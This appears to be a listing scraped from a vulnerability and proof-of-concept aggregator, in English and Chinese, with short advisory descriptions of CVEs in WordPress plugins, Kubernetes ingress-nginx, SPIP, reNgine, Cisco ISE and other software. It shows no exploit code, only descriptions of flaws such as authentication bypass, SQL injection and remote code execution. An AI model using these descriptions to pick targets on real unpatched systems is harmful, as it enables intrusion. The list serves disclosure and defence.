CVE-2023-2982: Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass POC
The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5. -
CVE-2023-30868: Tree Page View Plugin < 1.6.7 - Cross-Site Scripting POC
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed. -
CVE-2023-33405: BlogEngine CMS - Open Redirect POC
Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect -
CVE-2023-4136: CrafterCMS Engine - Cross-Site Scripting POC
CrafterCMS Engine is vulnerable to reflected cross-site scripting (XSS) via the transformerName parameter in the /api/1/site/url/transform endpoint, allowing attackers to execute arbitrary JavaScript in the context of the user. -
CVE-2023-4284: WordPress Post Timeline Plugin < 2.2.6 - Cross-Site Scripting POC
The Post Timeline WordPress plugin before version 2.2.6 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape an invalid nonce before outputting it back in an AJAX response, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context. -
CVE-2023-4596: WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload POC
The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. -
CVE-2023-46359: cPH2 Charging Station v1.87.0 - OS Command Injection POC
An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature. -
CVE-2023-47211: ManageEngine OpManager - Directory Traversal POC
A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. -
CVE-2023-5003: Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure POC
The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so. -
CVE-2023-50094: reNgine 2.2.0 - Command Injection POC
reNgine before 2.1.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output. -
CVE-2023-51409: Jordy Meow AI Engine - Unrestricted File Upload POC
Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine- ChatGPT Chatbot.This issue affects AI Engine- ChatGPT Chatbot- from n/a through 1.9.98. -
CVE-2023-51449: Gradio Hugging Face - Local File Inclusion POC
Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33 -
CVE-2023-6989: Shield Security WP Plugin <= 18.5.9 - Local File Inclusion POC
The Shield Security Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files. -
CVE-2024-10571: Chartify – WordPress Chart Plugin < 2.9.6 - Local File Inclusion POC
The Chartify – WordPress Chart Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.9.5 via the 'source' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. -
CVE-2024-10783: WordPress Plugin MainWP Child - Authentication Bypass POC
The plugin is vulnerable to an authentication bypass that allows an unauthenticated user to login as an administrator without providing a password. This vulnerability is only exploitable when the plugin has not been connected to a MainWP Dashboard and the "Require unique security ID" option is not enabled (it is disabled by default). -
CVE-2024-11921: Give WP Plugin < 3.19.0 - Cross-Site Scripting POC
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. -
CVE-2024-13322: Ads Pro Plugin <= 4.88 - Unauthenticated SQL Injection POC
The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to SQL Injection via the 'a_id' parameter in all versions up to, and including, 4.88 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. -
CVE-2024-13624: WordPress WPMovieLibrary Plugin <= 2.1.4.8 - Cross-Site Scripting POC
The WPMovieLibrary WordPress plugin through version 2.1.4.8 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'order' parameter in the import page before outputting it back, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context. -
CVE-2024-13853: WordPress SEO Tools Plugin 4.0.7 - Cross-Site Scripting POC
The SEO Tools WordPress plugin through version 4.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'src' parameter in the rssread.php file before outputting it back in the page, which could allow attackers to execute arbitrary JavaScript code in a victim's browser. -
CVE-2024-1512: MasterStudy LMS WordPress Plugin <= 3.2.5 - SQL Injection POC
The MasterStudy LMS WordPress Plugin for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. -
CVE-2024-2473: WPS Hide Login <= 1.9.15.2 - Login Page Disclosure POC
The WPS Hide Login plugin for WordPress is vulnerable to Login Page Disclosure in all versions up to, and including, 1.9.15.2. This is due to a bypass that is created when the 'action=postpass' parameter is supplied. This makes it possible for attackers to easily discover any login page that may have been hidden by the plugin. -
CVE-2024-27954: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF POC
WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1. -
CVE-2024-27956: WordPress Automatic Plugin <= 3.92.0 - SQL Injection POC
The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. -
CVE-2024-2879: WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection POC
The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. -
CVE-2024-33575: User Meta WP Plugin < 3.1 - Sensitive Information Exposure POC
The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data. -
CVE-2024-37881: SiteGuard WP Plugin <= 1.7.6 - Login Page Disclosure POC
The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page. -
CVE-2024-43917: WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection POC
In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917. -
CVE-2024-4434: LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection POC
The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the ‘term_id’ parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. -
CVE-2024-4443: Business Directory Plugin <= 6.4.2 - SQL Injection POC
The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. -
CVE-2024-6289: WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure POC
The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page. -
CVE-2024-6651: WordPress File Upload Plugin < 4.24.8 - Cross-Site Scripting POC
The WordPress File Upload plugin before version 4.24.8 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'dir' parameter in the file browser page before outputting it back, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context. -
CVE-2024-7313: Shield Security Plugin < 20.0.6 - Cross-Site Scripting POC
The Shield Security WordPress plugin before 20.0.6 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'nav_sub' parameter in the admin dashboard, allowing authenticated users to execute arbitrary JavaScript in the context of other authenticated administrators. -
CVE-2024-7954: SPIP Porte Plume Plugin - Remote Code Execution POC
The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request. -
CVE-2024-8517: SPIP BigUp Plugin - Remote Code Execution POC
SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request. -
CVE-2024-8856: WP Time Capsule Plugin - Remote Code Execution POC
The Backup and Staging by WP Time Capsule plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the the UploadHandler.php file and no direct file access prevention in all versions up to, and including, 1.22.21. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. -
CVE-2025-1097: Ingress-Nginx Controller - Configuration Injection via Unsanitized `auth-tls-match-cn` Annotation POC
A security issue was discovered in ingress-nginx https-//github.com/kubernetes/ingress-nginx where the `auth-tls-match-cn` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.) -
CVE-2025-1098: Ingress-Nginx Controller - Configuration Injection via Unsanitized Mirror Annotations POC
A security issue was discovered in ingress-nginx https-//github.com/kubernetes/ingress-nginx where the `mirror-target` and `mirror-host` Ingress annotations can be used to inject arbitrary configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.) -
CVE-2025-1974: Ingress-Nginx Controller - Remote Code Execution POC
A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.) -
CVE-2025-2010: WordPress JobWP Plugin <= 2.3.9 - SQL Injection POC
The JobWP - Job Board, Job Listing, Career Page and Recruitment Plugin plugin for WordPress is vulnerable to SQL Injection via the 'jobwp_upload_resume' parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. -
CVE-2025-24514: Ingress-Nginx Controller - Configuration Injection via Unsanitized `auth-url` Annotation POC
A security issue was discovered in ingress-nginx https-//github.com/kubernetes/ingress-nginx where the `auth-url` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.) -
CVE-2025-34032: Moodle LMS Jmol Plugin <= 6.1 - Cross-Site Scripting POC
A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content. -
CVE-2025-4380: Ads Pro Plugin <= 4.89 - Local File Inclusion POC
The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.89 via the 'bsa_template' parameter of the `bsa_preview_callback` function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases .php files can can be uploaded and included, or already exist on the site. -
CVE-2025-47646: PSW Front-end Login & Registration 1.13 - Weak Password Recovery POC
PSW Front-end Login & Registration plugin for WordPress contains a weak password recovery mechanism that can be exploited by unauthenticated attackers. This vulnerability affects versions through 1.13 and allows attackers to potentially gain unauthorized access. -
CVE-2025-5287: Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection POC
The Likes and Dislikes Plugin plugin for WordPress is vulnerable to SQL Injection via the 'post' parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. -
CVE-2025-53624: Docusaurus Gists Plugin < 4.0.0 - GitHub Personal Access Token Exposure POC
The Docusaurus gists plugin adds a page to your Docusaurus instance, displaying all public gists of a GitHub user. docusaurus-plugin-content-gists versions prior to 4.0.0 are vulnerable to exposing GitHub Personal Access Tokens in production build artifacts when passed through plugin configuration options. The token, intended for build-time API access only, is inadvertently included in client-side JavaScript bundles, making it accessible to anyone who can view the website's source code. -
CVE-2025-5961: WordPress WPvivid Backup & Migration Plugin <= 0.9.116 - Authenticated Arbitrary File Upload POC
The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpvivid_upload_import_files' function in all versions up to, and including, 0.9.116. -
CVE-2018-17207: WordPress Duplicator Plugin < 1.2.42 - Arbitrary Code Execution POC
An issue was discovered in Snap Creek Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can inject PHP code into wp-config.php during the database setup step, achieving arbitrary code execution. -
CVE-2019-9881: WPEngine WPGraphQL 0.2.3 - Unauthenticated Comment Posting POC
The createComment mutation in the WPGraphQL 0.2.3 plugin for WordPress allows unauthenticated users to post comments on any article, even when 'allow comment' is disabled. -
CVE-2020-27615: WordPress Loginizer < 1.6.4 – Unauthenticated SQL Injection via `log` Parameter POC
The Loginizer plugin before 1.6.4 for WordPress allows SQL injection (with resultant XSS), related to loginizer_login_failed and lz_valid_ip. -
CVE-2024-2771: Contact Form Plugin by Fluent Forms < 5.1.17 - Unauthenticated Limited Privilege Escalation POC
The plugin is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts. -
CVE-2024-8353: GiveWP Donation Plugin <= 3.16.1 - Unauthenticated PHP Object Injection POC
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1. This is due to insufficient input validation on user-supplied data. An unauthenticated attacker can inject a serialized PHP object, which may allow them to execute arbitrary PHP code, depending on the presence of a suitable POP chain on the target system. This vulnerability could lead to full site compromise. -
CVE-2019-9880: WPEngine WPGraphQL 0.2.3 - Unauthenticated User Information Disclosure POC
An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, it is possible, for an unauthenticated attacker, to retrieve all WordPress users details such as email address, role, and username. -
PHPGurukul User Registration & Login and User Management System 注入漏洞 无POC
PHPGurukul User Registration & Login and User Management System是PHPGurukul公司的一个用户注册登录及用户管理系统。 PHPGurukul User Registration & Login and User Management System 3.3版本存在注入漏洞,该漏洞源于对文件/admin/user-profile.php中参数uid的错误操作导致SQL注入。 -
WordPress Plugin Suretriggers /wp-json/sure-triggers/v1/automation/action 未授权访问漏洞(CVE-2025-3102) 无POC
WordPress的SureTriggers插件是一款用于自动化任务的插件,旨在简化用户的工作流程。然而,该插件的所有版本(包括1.0.78版本)中存在身份验证绕过漏洞。漏洞位于'authenticate_user'函数中,由于未对'secret_key'值进行空值检查,攻击者可以利用该漏洞在未配置API密钥的情况下创建管理员账户,从而对目标网站造成严重威胁。 -
SPIP BigUp Plugin /spip.php 命令执行漏洞(CVE-2024-8517) 无POC
SPIP是一款开源的内容管理系统(CMS),广泛用于创建和管理动态网站。SPIP的BigUp插件在版本4.3.2、4.2.16和4.1.18之前存在命令执行漏洞。攻击者可以通过发送精心构造的多部分文件上传HTTP请求,利用该漏洞执行任意操作系统命令。 -
WordPress Plugin R+L Carrier Edition /wp-admin/admin-ajax.php SQL 注入漏洞(CVE-2024-13481) 无POC
R+L Carrier Edition 插件是一款专为 WordPress 用户设计的物流与运输管理工具,通过与 R+L Carriers 的深度集成,提供运费计算、货运跟踪和物流管理功能。该插件的 /wp-admin/admin-ajax.php 接口存在 SQL 注入漏洞,攻击者可以通过构造恶意的 SQL 语句,利用该漏洞获取数据库中的敏感信息,例如管理员后台密码、用户个人信息等,甚至可能进一步向服务器写入恶意代码,获取系统权限。此漏洞可能导致用户数据泄露、数据库篡改以及系统完整性破坏。 -
Kubernetes Ingress-NGINX Controller 存在未授权远程代码执行漏洞(CVE-2025-1974) 无POC
Ingress-NGINXController是Kubernetes生态的核心项目之一,作为集群流量入口网关,实现Ingress资源定义的流量路由规则,通过NGINX实现反向代理和负载均衡功能。Kubernetes Ingress-NGINXController 存在未授权远程代码执行漏洞(CVE-2025-1974),攻击者可以通过该漏洞获取服务器敏感信息,执行恶意命令,控制整个服务器。 -
Kubernetes ingress-nginx 输入验证错误漏洞 无POC
漏洞源于 Ingress NGINX Controller 的准入控制器在处理 Ingress 对象时,未对用户输入进行充分验证和清理。攻击者通过向准入控制器发送恶意的 AdmissionReview 请求,可以注入任意 NGINX 配置指令,并在配置验证阶段(使用 nginx -t)触发代码执行。 -
WordPress plugin what3words Address Field 跨站请求伪造漏洞 无POC
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin what3words Address Field 4.0.15版本及之前版本存在跨站请求伪造漏洞,该漏洞源于包含一个跨站请求伪造 (CSRF) 漏洞。 -
reNgine 跨站脚本漏洞 无POC
reNgine是Yogesh Ojha个人开发者的一个用于 Web 应用程序的自动侦察框架。专注于通过引擎、侦察数据关联和组织、持续监控、由数据库和简单而直观的用户界面支持的高度可配置的流线型侦察过程。 reNgine 2.2.0及之前版本存在跨站脚本漏洞,该漏洞源于存在存储型跨站脚本(XSS)漏洞,允许在管理员查看或与受影响的用户条目交互时执行未经授权的脚本,对敏感的管理功能构成重大风险。 -
reNgine 访问控制错误漏洞 无POC
reNgine是Yogesh Ojha个人开发者的一个用于 Web 应用程序的自动侦察框架。专注于通过引擎、侦察数据关联和组织、持续监控、由数据库和简单而直观的用户界面支持的高度可配置的流线型侦察过程。 reNgine 2.2.0及之前版本存在访问控制错误漏洞,该漏洞源于允许具有特定角色的攻击者删除系统中的所有项目。 -
reNgine 跨站脚本漏洞 无POC
reNgine是Yogesh Ojha个人开发者的一个用于 Web 应用程序的自动侦察框架。专注于通过引擎、侦察数据关联和组织、持续监控、由数据库和简单而直观的用户界面支持的高度可配置的流线型侦察过程。 reNgine 2.2.0及之前版本存在跨站脚本漏洞,该漏洞源于不正确地验证或清理用户输入,会发生HTML注入,从而允许攻击者注入任意HTML代码。 -
WordPress plugin Membership Plugin – Restrict Content 信息泄露漏洞 无POC
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Membership Plugin – Restrict Content 3.2.13及之前版本存在信息泄露漏洞,该漏洞源于核心搜索功能未对搜索结果中的内容访问权限进行严格限制,导致敏感信息泄露。 -
WordPress plugin Flexmls IDX Plugin 跨站脚本漏洞 无POC
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Flexmls IDX Plugin 3.14.26版本及之前版本存在跨站脚本漏洞,该漏洞源于api_key和api_secret参数包含一个存储型跨站脚本漏洞。 -
WordPress plugin Plethora Plugins Tabs + Accordions 跨站脚本漏洞 无POC
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Plethora Plugins Tabs + Accordions 1.1.5版本及之前版本存在跨站脚本漏洞,该漏洞源于网页生成过程中输入的中和不当,导致跨站脚本漏洞。 -
WordPress plugin RSVP and Event Management Plugin SQL注入漏洞 无POC
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin RSVP and Event Management Plugin 2.7.14版本及之前版本存在SQL注入漏洞,该漏洞源于SQL命令中所使用的特殊元素的中和不当,导致SQL注入漏洞。 -
WordPress plugin LH Login Page 跨站脚本漏洞 无POC
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin LH Login Page 2.14版本及之前版本存在跨站脚本漏洞,该漏洞源于网页生成过程中输入的中和不当,导致跨站脚本漏洞。 -
WordPress plugin Social Media Engine 跨站脚本漏洞 无POC
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Social Media Engine 1.0.2版本及之前版本存在跨站脚本漏洞,该漏洞源于在网页生成期间输入中和不当。 -
WordPress plugin HireHive Job Plugin 跨站脚本漏洞 无POC
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin HireHive Job Plugin 2.9.0版本及之前版本存在跨站脚本漏洞,该漏洞源于在网页生成期间输入中和不当。 -
华夏ERP plugin 远程代码执行漏洞 无POC
远程代码执行漏洞是指攻击者通过某些漏洞在服务器上执行任意代码,这通常是由于应用程序对外部输入的验证不足或处理不当造成的。攻击者可以利用这个漏洞上传恶意代码或直接通过HTTP请求发送恶意代码,从而控制服务器,进行包括数据窃取、网站篡改、服务器资源滥用等在内的多种恶意行为。 -
蓝凌OA loginWebserviceService 任意文件读取漏洞 POC
蓝凌oa办公系统是用于即时办公通讯的oa办公工具。深圳市蓝凌软件股份有限公司数字OA存在任意文件读取漏洞,攻击者可利用该漏洞获取服务器相关信息。 -
Cisco Identity Services Engine 跨站脚本漏洞 无POC
Cisco Identity Services Engine(Cisco ISE)是美国思科(Cisco)公司的一款环境感知平台(ISE身份服务引擎)。该平台通过收集网络、用户和设备中的实时信息,制定并实施相应策略来监管网络。 Cisco Identity Services Engine存在跨站脚本漏洞,该漏洞源于受影响系统的基于Web的管理界面对用户提供的输入验证不足。经过身份验证的远程攻击者绕过授权机制或进行跨站脚本(XSS)攻击。 -
Cisco Identity Services Engine 跨站脚本漏洞 无POC
Cisco Identity Services Engine(Cisco ISE)是美国思科(Cisco)公司的一款环境感知平台(ISE身份服务引擎)。该平台通过收集网络、用户和设备中的实时信息,制定并实施相应策略来监管网络。 Cisco Identity Services Engine存在跨站脚本漏洞,该漏洞源于基于Web的管理界面没有正确验证用户提供的输入。远程攻击者对基于Web的管理界面的用户发起跨站脚本(XSS)攻击、执行路径遍历攻击、读取和删除受影响设备上的任意文件,或通过设备发起服务器端请求伪造(SSRF)攻击。 -
Cisco Identity Services Engine 路径遍历漏洞 无POC
Cisco Identity Services Engine(Cisco ISE)是美国思科(Cisco)公司的一款环境感知平台(ISE身份服务引擎)。该平台通过收集网络、用户和设备中的实时信息,制定并实施相应策略来监管网络。 Cisco Identity Services Engine存在路径遍历漏洞,该漏洞源于API请求中对用户提供的参数验证不足。远程攻击者对基于Web的管理界面的用户发起跨站脚本(XSS)攻击、执行路径遍历攻击、读取和删除受影响设备上的任意文件,或通过设备发起服务器端请求伪造(SSRF)攻击。 -
Cisco Identity Services Engine 跨站脚本漏洞 无POC
Cisco Identity Services Engine(Cisco ISE)是美国思科(Cisco)公司的一款环境感知平台(ISE身份服务引擎)。该平台通过收集网络、用户和设备中的实时信息,制定并实施相应策略来监管网络。 Cisco Identity Services Engine存在跨站脚本漏洞,该漏洞源于基于Web的管理界面没有充分验证用户提供的输入。远程攻击者对受影响设备上基于Web的管理界面的用户发起授权绕过攻击和跨站脚本(XSS)攻击。 -
Cisco Identity Services Engine 路径遍历漏洞 无POC
Cisco Identity Services Engine(Cisco ISE)是美国思科(Cisco)公司的一款环境感知平台(ISE身份服务引擎)。该平台通过收集网络、用户和设备中的实时信息,制定并实施相应策略来监管网络。 Cisco Identity Services Engine存在路径遍历漏洞,该漏洞源于API请求中对用户提供的参数验证不足。远程攻击者对基于Web的管理界面的用户发起跨站脚本(XSS)攻击、执行路径遍历攻击、读取和删除受影响设备上的任意文件,或通过设备发起服务器端请求伪造(SSRF)攻击。 -
F5 Nginx 授权问题漏洞 无POC
F5 Nginx是美国F5公司的一款轻量级Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like协议下发行。 F5 Nginx存在授权问题漏洞,该漏洞源于登录时未检查随机数。